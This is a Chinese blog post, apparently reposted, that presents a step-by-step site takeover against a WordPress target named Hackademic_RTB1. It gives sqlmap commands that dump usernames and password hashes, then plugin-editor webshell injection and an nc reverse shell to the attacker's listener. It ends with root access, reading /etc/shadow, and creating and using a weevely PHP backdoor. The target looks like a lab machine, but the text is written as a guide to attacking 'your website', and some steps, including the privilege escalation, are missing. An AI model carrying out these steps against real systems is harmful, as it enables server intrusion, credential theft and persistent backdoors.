标签:命令 img dash 表名 ada rtb 电脑 rev use
话不多说今天带大家实战如何轻松拿站
现在我们获取了网站服务器的IP地址为:173.236.138.113
寻找同一服务器上的其它网站,我们使用sameip.org.
我们需要关于你网站的以下信息:
让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.
我们发现你的DNS记录如下
让我们来确定web服务器的类型
我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.
我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.
我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:
1-Find services that run on server(查看服务器上运行的服务)
2-Find server OS(查看操作系统版本)
我们也会用到Backtrack 5 R1中的W3AF 工具:
root@bt:/pentest/web/w3af#./w3af_gui
我们输入要检测的网站地址,选择完整的安全审计选项.
稍等一会,你将会看到扫描结果.
发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.
Using sqlmap with –u url
过一会你会看到
输入N按回车键继续
我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.
发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名
通过参数“-T wp_users –columns ”来查看wp_users表中的字段.
接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”
我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
登陆wordpress的后台wp-admin
尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.
Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。
我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.
然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.
点击连接我们会看到
接下来我们尝试执行一些命令:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(用来显示用户的id和组)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
(显示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息)
执行完成之后我们输入id命令
id
我们发现我们已经是root权限了
uid=0(root) gid=0(root)
现在我们可以查看/etc/shadow文件
cat/etc/shadow
2.用weevely创建一个密码为koko的php后门
root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
接下来上传到服务器之后来使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko
测试我们的hax.php后门
完成,撒花!
标签:命令 img dash 表名 ada rtb 电脑 rev use
原文地址:https://www.cnblogs.com/luchangjiang/p/10463471.html